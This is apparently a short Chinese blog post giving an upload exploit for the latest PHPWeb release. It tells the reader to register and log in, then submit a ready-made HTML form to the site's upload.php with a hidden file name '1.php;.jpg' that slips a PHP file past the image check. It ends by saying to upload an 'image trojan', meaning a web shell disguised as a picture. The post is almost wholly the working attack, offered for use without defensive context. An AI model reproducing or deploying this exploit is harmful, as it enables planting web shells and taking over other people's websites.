phpweb最新版的一个上传漏洞

/ 0评 / 0

利用前提:先随便注册一个账号--- 然后登录---再打开这个exp就可以了

[php]<form name="uploadForm" style="margin:0;padding:0;" method="post" enctype="multipart/form-data" action="http://xxxxx.com/maq/upload.php">

<input type="hidden" name="fileName" id="fileName" value="1.php;.jpg" />

<input type="hidden" name="attachPath" id="fileName" value="maq/pics/" />

<input type="file" name="fileData" id="imgFile" size="14" style="border:1px solid #555555;">

<input type="submit" name="button" id="KE_IMAGEsubmitButton" value="上传" style="border:1px solid #555555;background-color:#AAAAAA;" />

</form>
[/php]

直接上传图片马就成了。上传后的名字是1.php;.jpg   

发表评论

电子邮件地址不会被公开。 必填项已用*标注